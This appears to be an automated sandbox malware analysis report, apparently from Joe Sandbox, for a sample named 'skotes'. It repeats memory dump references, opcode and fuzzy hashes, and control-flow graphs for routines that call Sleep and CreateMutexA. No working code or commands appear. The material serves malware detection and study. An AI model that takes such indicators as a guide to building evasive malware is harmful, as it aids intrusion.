                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: ba1b58b96e2be886380cf49f0c2f0747bb4aeaf06a35914551c1f98d4044374a
                                                                                                                                                                                                                                                  • Instruction ID: 2686c535a237c0fc160ca27a85018bbd625970f6327e1b014cf1f2b6935c9e52
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba1b58b96e2be886380cf49f0c2f0747bb4aeaf06a35914551c1f98d4044374a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C316A31B002009BEB18DB79CC88B6DB762EBC5334F244218E494EB3D1C7368980EB52

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 90 f3a1ae-f3a1ce 94 f3a1d0-f3a1dc 90->94 95 f3a1fc-f3a218 90->95 98 f3a1f2-f3a1f9 call f4d663 94->98 99 f3a1de-f3a1ec 94->99 96 f3a246-f3a265 95->96 97 f3a21a-f3a226 95->97 102 f3a293-f3a916 call f480c0 96->102 103 f3a267-f3a273 96->103 100 f3a228-f3a236 97->100 101 f3a23c-f3a243 call f4d663 97->101 98->95 99->98 104 f3a935 99->104 100->101 100->104 101->96 107 f3a275-f3a283 103->107 108 f3a289-f3a290 call f4d663 103->108 110 f3a953-f3a994 Sleep CreateMutexA 104->110 111 f3a935 call f66c6a 104->111 107->104 107->108 108->102 120 f3a9a7-f3a9a8 110->120 121 f3a996-f3a998 110->121 111->110 121->120 122 f3a99a-f3a9a5 121->122 122->120
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 5d68945217df9a29f80ba99a6da567773f75e4a047d9b735cb4f910e2190e343
                                                                                                                                                                                                                                                  • Instruction ID: b7bdf735cedba83b35325ddf722af7551e954ad3265aec533647f195330ab3dc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d68945217df9a29f80ba99a6da567773f75e4a047d9b735cb4f910e2190e343
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89314A31B052419BEB089B7DDC8DB6DB762EBC6330F244219E454EB3D1D7368980AB52

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 124 f3a418-f3a438 128 f3a466-f3a482 124->128 129 f3a43a-f3a446 124->129 132 f3a4b0-f3a4cf 128->132 133 f3a484-f3a490 128->133 130 f3a448-f3a456 129->130 131 f3a45c-f3a463 call f4d663 129->131 130->131 136 f3a93f-f3a949 call f66c6a * 2 130->136 131->128 134 f3a4d1-f3a4dd 132->134 135 f3a4fd-f3a916 call f480c0 132->135 138 f3a492-f3a4a0 133->138 139 f3a4a6-f3a4ad call f4d663 133->139 140 f3a4f3-f3a4fa call f4d663 134->140 141 f3a4df-f3a4ed 134->141 155 f3a94e 136->155 156 f3a949 call f66c6a 136->156 138->136 138->139 139->132 140->135 141->136 141->140 157 f3a953-f3a994 Sleep CreateMutexA 155->157 158 f3a94e call f66c6a 155->158 156->155 160 f3a9a7-f3a9a8 157->160 161 f3a996-f3a998 157->161 158->157 161->160 162 f3a99a-f3a9a5 161->162 162->160
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: e267a0ea70ec303e5673465c7c0b19d47fc679175eefbf613b9ef19adceea195
                                                                                                                                                                                                                                                  • Instruction ID: bf8c036585d2f7cce12cd4fb624e4836c7264b8f127c6b1e22f472de01f9bfda
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e267a0ea70ec303e5673465c7c0b19d47fc679175eefbf613b9ef19adceea195
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C312931B051009BEB08DB79DC8DB6DB761EFC5334F248218E494EB3E5D7798980AB52

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 164 f3a54d-f3a56d 168 f3a59b-f3a5b7 164->168 169 f3a56f-f3a57b 164->169 172 f3a5e5-f3a604 168->172 173 f3a5b9-f3a5c5 168->173 170 f3a591-f3a598 call f4d663 169->170 171 f3a57d-f3a58b 169->171 170->168 171->170 174 f3a944-f3a949 call f66c6a 171->174 178 f3a632-f3a916 call f480c0 172->178 179 f3a606-f3a612 172->179 176 f3a5c7-f3a5d5 173->176 177 f3a5db-f3a5e2 call f4d663 173->177 192 f3a94e 174->192 193 f3a949 call f66c6a 174->193 176->174 176->177 177->172 184 f3a614-f3a622 179->184 185 f3a628-f3a62f call f4d663 179->185 184->174 184->185 185->178 194 f3a953-f3a994 Sleep CreateMutexA 192->194 195 f3a94e call f66c6a 192->195 193->192 198 f3a9a7-f3a9a8 194->198 199 f3a996-f3a998 194->199 195->194 199->198 200 f3a99a-f3a9a5 199->200 200->198
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
